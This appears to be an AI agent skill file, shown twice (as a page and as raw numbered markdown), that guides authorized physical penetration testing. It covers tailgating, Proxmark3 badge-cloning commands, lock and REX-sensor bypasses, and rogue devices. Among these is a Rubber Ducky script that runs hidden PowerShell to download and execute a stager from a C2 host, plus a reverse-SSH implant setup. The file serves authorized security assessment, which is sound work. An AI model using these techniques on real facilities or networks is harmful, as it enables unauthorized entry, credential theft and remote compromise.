Performing Physical Intrusion Assessment
Overview
Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).
When to Use
Trigger phrases:
"performing physical intrusion assessment"
"Conduct authorized physical penetration testing using tailgating, badge cloning,"
When conducting security assessments that involve performing physical intrusion assessment
When following incident response procedures for related security events
When performing scheduled security testing or auditing activities
When validating security controls through hands-on testing
Prerequisites
- Signed authorization letter (carry at all times during assessment)
- Emergency contact for client security team (24/7)
- Get-out-of-jail letter signed by executive authority
- Physical security testing toolkit
- Body camera or documentation equipment
- Disguise/cover identity materials (uniform, badge, clipboard)
MITRE ATT&CK Mapping
| Technique ID |
Name |
Tactic |
| T1200 |
Hardware Additions |
Initial Access |
| T1091 |
Replication Through Removable Media |
Initial Access |
| T1199 |
Trusted Relationship |
Initial Access |
| T1078 |
Valid Accounts |
Initial Access |
Physical Security Testing Toolkit
| Tool |
Purpose |
Approximate Cost |
| Proxmark3 RDV4 |
RFID badge cloning (125kHz/13.56MHz) |
$300 |
| Flipper Zero |
Multi-protocol RF analysis |
$170 |
| Lock pick set (Sparrows) |
Mechanical lock bypassing |
$35 |
| Under-door tool (UDT) |
Bypass door from outside |
$30 |
| Shove knife / latch slip |
Spring bolt bypass |
$15 |
| LAN Turtle |
Rogue network implant |
$60 |
| WiFi Pineapple |
Rogue wireless AP |
$100 |
| Rubber Ducky / Bash Bunny |
USB keystroke injection |
$50-80 |
| Clipboard + hard hat + hi-vis |
Social engineering props |
$20 |
| Body camera |
Evidence documentation |
$50 |
Technique 1: Tailgating
Tailgating involves following an authorized person through a secured entry point without presenting credentials.
Methods:
- Hands full approach: Carry boxes/equipment, ask someone to hold the door
- Smoke break return: Wait near smoking area, follow employees back inside
- Delivery driver: Wear delivery uniform, carry packages
- Busy entrance timing: Enter during shift change or lunch rush
- Door propping: Observe if employees prop doors open
Countermeasures to test:
- Turnstiles / mantraps
- Security guard challenge procedures
- Piggybacking detection systems
- Employee security awareness
Technique 2: Badge Cloning
# Proxmark3 - Read a low-frequency (125kHz) HID card
proxmark3> lf hid read
# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# Clone to a T5577 blank card
proxmark3> lf hid clone --fc 123 --cn 45678
# Read high-frequency (13.56MHz) MIFARE card
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# Long-range capture with custom antenna (up to 3 feet)
proxmark3> lf hid read # with extended antenna
# Flipper Zero - Read and emulate
# RFID > Read > Hold card to Flipper > Save > Emulate
Badge cloning attack flow:
- Position near badge reader (elevator, door entry)
- Read badge wirelessly as employee passes (1-3 second window)
- Clone to blank card
- Use cloned badge to access secured areas
- Document which areas were accessible
Technique 3: Lock Bypassing
| Lock Type |
Bypass Method |
Difficulty |
| Pin tumbler (standard) |
Pick, rake, or bump key |
Easy-Medium |
| Wafer lock (filing cabinets) |
Pick or jiggle |
Easy |
| Tubular lock (vending, server) |
Tubular pick tool |
Easy |
| Electronic lock (keypad) |
Shoulder surf, thermal camera |
Medium |
| Magnetic lock (mag lock) |
Under-door tool, REX sensor bypass |
Medium |
| Smart lock (Bluetooth) |
Replay attack, firmware exploit |
Hard |
# Electronic keypad - thermal imaging after use
# Warmer keys = more recently pressed
# Use FLIR camera to capture heat signatures within 30 seconds
# REX (Request to Exit) sensor bypass
# Insert thin wire or use a can of compressed air to trigger motion sensor
# on the inside of a mag-locked door
Technique 4: Rogue Device Deployment
# LAN Turtle - Plug into exposed Ethernet port
# Provides SSH reverse tunnel back to C2 server
# Auto-configures as man-in-the-middle
# Configure LAN Turtle for reverse SSH
# Module: AutoSSH
# Host: c2.redteam.com
# Port: 22
# Remote port: 2222
# WiFi Pineapple - Deploy in common area
# Captures wireless credentials via evil twin attack
# Exfiltrates data over cellular modem
# USB Rubber Ducky - Drop in parking lot or leave on desk
# Payload: Download and execute C2 agent
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
Technique 5: Dumpster Diving
Search external waste containers and recycling bins for:
- Printed documents with sensitive information
- Employee directories and org charts
- Network diagrams and IP addresses
- Shredded documents (cross-cut vs strip-cut assessment)
- Discarded hardware (hard drives, USB drives)
Assessment Methodology
This section covers assessment methodology for performing physical intrusion assessment.
- Ensure all prerequisites are met before proceeding
- Follow the documented workflow steps in sequence
- Record results and any anomalies encountered during this phase
Pre-Assessment Reconnaissance
- Perimeter walk - identify all entry points, cameras, guard posts
- Observe employee patterns - shift changes, break schedules
- Identify badge technology (HID, MIFARE, iCLASS)
- Map camera coverage and blind spots
- Note security guard patrol routes and timing
Execution Phases
- External perimeter: Fencing, gates, parking barriers
- Building entry: Main entrance, side doors, loading dock
- Internal access: Floor access, elevator controls
- Restricted areas: Server rooms, executive offices, data centers
- Device deployment: Network implants, rogue wireless
Documentation Requirements
- Timestamp and location for every access attempt
- Photos/video of successful entries
- Badge reader locations that accepted cloned credentials
- Unlocked doors, propped doors, tailgating opportunities
- Network ports accessible in public areas
- Evidence of data in waste containers
Ethical and Safety Considerations
- Always carry authorization letter - Be prepared to identify yourself immediately if confronted
- Never force entry - If a technique damages property, document and skip
- Immediate stop if law enforcement is called before deconfliction
- Never photograph individuals without authorization
- Document, don't exploit - Take photos as evidence, don't steal actual data
- Safety first - Do not enter hazardous areas or bypass fire safety
When NOT to Use
- You don't have explicit written authorization to test
- Task is about defense/detection, not offense (use detection skills)
- You need to implement security controls (use implementing-* skills)
- Task requires compliance auditing (use auditing-* skills)
- You're investigating an incident (use incident response skills)
- Target is out of scope for your engagement
- Task is about vulnerability scanning only (use scanning tools)
Red Flags
- Performing actions without explicit written authorization from the asset owner
- Testing against production systems without a defined scope and rules of engagement
- Exceeding the authorized scope of the engagement
- Leaving persistent access mechanisms without explicit approval
- Causing denial-of-service on production systems during testing
Verification
- All steps executed successfully against a test environment before production use
- Output documented with screenshots or logs demonstrating expected behavior
- All exploited vulnerabilities documented with reproduction steps
- Scope boundaries confirmed — only authorized targets were tested
- Remediation recommendations included for every finding
References
- ISACA Physical Penetration Testing White Paper (2023)
- ASIS Physical Security Professional (PSP) guidelines
- NIST SP 800-116 Rev. 1: Smart Card PIV guidelines
- Deviant Ollam - Physical Security Assessment methodology
- MITRE ATT&CK T1200: https://attack.mitre.org/techniques/T1200/
Process
- Analyze the task requirements
- Apply domain expertise
- Verify output quality
Anti-Rationalization Table
| Rationalization |
Reality |
| "We are too small to be targeted" |
Automated attacks target everyone. Size does not matter. |
| "Security slows us down" |
A breach slows you down 100x more. Build security in from the start. |
| "We will fix it after launch" |
Vulnerabilities in production are exploited within hours. Fix before deploy. |
1---2name: performing-physical-intrusion-assessment3description: Use when conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls. Use when conducting authorized physical penetration testing using tailgating, badge cloning, lock.4license: Apache-2.05---678# Performing Physical Intrusion Assessment910## Overview1112Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).131415## When to Use16**Trigger phrases:**17- "performing physical intrusion assessment"18- "Conduct authorized physical penetration testing using tailgating, badge cloning,"192021- When conducting security assessments that involve performing physical intrusion assessment22- When following incident response procedures for related security events23- When performing scheduled security testing or auditing activities24- When validating security controls through hands-on testing2526## Prerequisites2728- Signed authorization letter (carry at all times during assessment)29- Emergency contact for client security team (24/7)30- Get-out-of-jail letter signed by executive authority31- Physical security testing toolkit32- Body camera or documentation equipment33- Disguise/cover identity materials (uniform, badge, clipboard)3435## MITRE ATT&CK Mapping3637| Technique ID | Name | Tactic |38|---|---|---|39| T1200 | Hardware Additions | Initial Access |40| T1091 | Replication Through Removable Media | Initial Access |41| T1199 | Trusted Relationship | Initial Access |42| T1078 | Valid Accounts | Initial Access |4344## Physical Security Testing Toolkit4546| Tool | Purpose | Approximate Cost |47|---|---|---|48| Proxmark3 RDV4 | RFID badge cloning (125kHz/13.56MHz) | $300 |49| Flipper Zero | Multi-protocol RF analysis | $170 |50| Lock pick set (Sparrows) | Mechanical lock bypassing | $35 |51| Under-door tool (UDT) | Bypass door from outside | $30 |52| Shove knife / latch slip | Spring bolt bypass | $15 |53| LAN Turtle | Rogue network implant | $60 |54| WiFi Pineapple | Rogue wireless AP | $100 |55| Rubber Ducky / Bash Bunny | USB keystroke injection | $50-80 |56| Clipboard + hard hat + hi-vis | Social engineering props | $20 |57| Body camera | Evidence documentation | $50 |5859## Technique 1: Tailgating6061Tailgating involves following an authorized person through a secured entry point without presenting credentials.6263**Methods:**64- **Hands full approach**: Carry boxes/equipment, ask someone to hold the door65- **Smoke break return**: Wait near smoking area, follow employees back inside66- **Delivery driver**: Wear delivery uniform, carry packages67- **Busy entrance timing**: Enter during shift change or lunch rush68- **Door propping**: Observe if employees prop doors open6970**Countermeasures to test:**71- Turnstiles / mantraps72- Security guard challenge procedures73- Piggybacking detection systems74- Employee security awareness7576## Technique 2: Badge Cloning7778```bash79# Proxmark3 - Read a low-frequency (125kHz) HID card80proxmark3> lf hid read81# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 456788283# Clone to a T5577 blank card84proxmark3> lf hid clone --fc 123 --cn 456788586# Read high-frequency (13.56MHz) MIFARE card87proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF8889# Long-range capture with custom antenna (up to 3 feet)90proxmark3> lf hid read # with extended antenna9192# Flipper Zero - Read and emulate93# RFID > Read > Hold card to Flipper > Save > Emulate94```9596**Badge cloning attack flow:**971. Position near badge reader (elevator, door entry)982. Read badge wirelessly as employee passes (1-3 second window)993. Clone to blank card1004. Use cloned badge to access secured areas1015. Document which areas were accessible102103## Technique 3: Lock Bypassing104105| Lock Type | Bypass Method | Difficulty |106|---|---|---|107| Pin tumbler (standard) | Pick, rake, or bump key | Easy-Medium |108| Wafer lock (filing cabinets) | Pick or jiggle | Easy |109| Tubular lock (vending, server) | Tubular pick tool | Easy |110| Electronic lock (keypad) | Shoulder surf, thermal camera | Medium |111| Magnetic lock (mag lock) | Under-door tool, REX sensor bypass | Medium |112| Smart lock (Bluetooth) | Replay attack, firmware exploit | Hard |113114```bash115# Electronic keypad - thermal imaging after use116# Warmer keys = more recently pressed117# Use FLIR camera to capture heat signatures within 30 seconds118119# REX (Request to Exit) sensor bypass120# Insert thin wire or use a can of compressed air to trigger motion sensor121# on the inside of a mag-locked door122```123124## Technique 4: Rogue Device Deployment125126```bash127# LAN Turtle - Plug into exposed Ethernet port128# Provides SSH reverse tunnel back to C2 server129# Auto-configures as man-in-the-middle130131# Configure LAN Turtle for reverse SSH132# Module: AutoSSH133# Host: c2.redteam.com134# Port: 22135# Remote port: 2222136137# WiFi Pineapple - Deploy in common area138# Captures wireless credentials via evil twin attack139# Exfiltrates data over cellular modem140141# USB Rubber Ducky - Drop in parking lot or leave on desk142# Payload: Download and execute C2 agent143# Duckyscript:144# DELAY 1000145# GUI r146# DELAY 500147# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"148# ENTER149```150151## Technique 5: Dumpster Diving152153Search external waste containers and recycling bins for:154- Printed documents with sensitive information155- Employee directories and org charts156- Network diagrams and IP addresses157- Shredded documents (cross-cut vs strip-cut assessment)158- Discarded hardware (hard drives, USB drives)159160## Assessment Methodology161162This section covers assessment methodology for performing physical intrusion assessment.163164- Ensure all prerequisites are met before proceeding165- Follow the documented workflow steps in sequence166- Record results and any anomalies encountered during this phase167### Pre-Assessment Reconnaissance1681. Perimeter walk - identify all entry points, cameras, guard posts1692. Observe employee patterns - shift changes, break schedules1703. Identify badge technology (HID, MIFARE, iCLASS)1714. Map camera coverage and blind spots1725. Note security guard patrol routes and timing173174### Execution Phases1751. **External perimeter**: Fencing, gates, parking barriers1762. **Building entry**: Main entrance, side doors, loading dock1773. **Internal access**: Floor access, elevator controls1784. **Restricted areas**: Server rooms, executive offices, data centers1795. **Device deployment**: Network implants, rogue wireless180181### Documentation Requirements182- Timestamp and location for every access attempt183- Photos/video of successful entries184- Badge reader locations that accepted cloned credentials185- Unlocked doors, propped doors, tailgating opportunities186- Network ports accessible in public areas187- Evidence of data in waste containers188189## Ethical and Safety Considerations1901911. **Always carry authorization letter** - Be prepared to identify yourself immediately if confronted1922. **Never force entry** - If a technique damages property, document and skip1933. **Immediate stop** if law enforcement is called before deconfliction1944. **Never photograph individuals** without authorization1955. **Document, don't exploit** - Take photos as evidence, don't steal actual data1966. **Safety first** - Do not enter hazardous areas or bypass fire safety197198## When NOT to Use199200- You don't have explicit written authorization to test201- Task is about defense/detection, not offense (use detection skills)202- You need to implement security controls (use implementing-* skills)203- Task requires compliance auditing (use auditing-* skills)204- You're investigating an incident (use incident response skills)205- Target is out of scope for your engagement206- Task is about vulnerability scanning only (use scanning tools)207208209## Red Flags210211- Performing actions without explicit written authorization from the asset owner212- Testing against production systems without a defined scope and rules of engagement213- Exceeding the authorized scope of the engagement214- Leaving persistent access mechanisms without explicit approval215- Causing denial-of-service on production systems during testing216217## Verification218219- All steps executed successfully against a test environment before production use220- Output documented with screenshots or logs demonstrating expected behavior221- All exploited vulnerabilities documented with reproduction steps222- Scope boundaries confirmed — only authorized targets were tested223- Remediation recommendations included for every finding224225## References226227- ISACA Physical Penetration Testing White Paper (2023)228- ASIS Physical Security Professional (PSP) guidelines229- NIST SP 800-116 Rev. 1: Smart Card PIV guidelines230- Deviant Ollam - Physical Security Assessment methodology231- MITRE ATT&CK T1200: https://attack.mitre.org/techniques/T1200/232233## Process2342351. Analyze the task requirements2362. Apply domain expertise2373. Verify output quality238239## Anti-Rationalization Table240241| Rationalization | Reality |242|---|---|243| "We are too small to be targeted" | Automated attacks target everyone. Size does not matter. |244| "Security slows us down" | A breach slows you down 100x more. Build security in from the start. |245| "We will fix it after launch" | Vulnerabilities in production are exploited within hours. Fix before deploy. |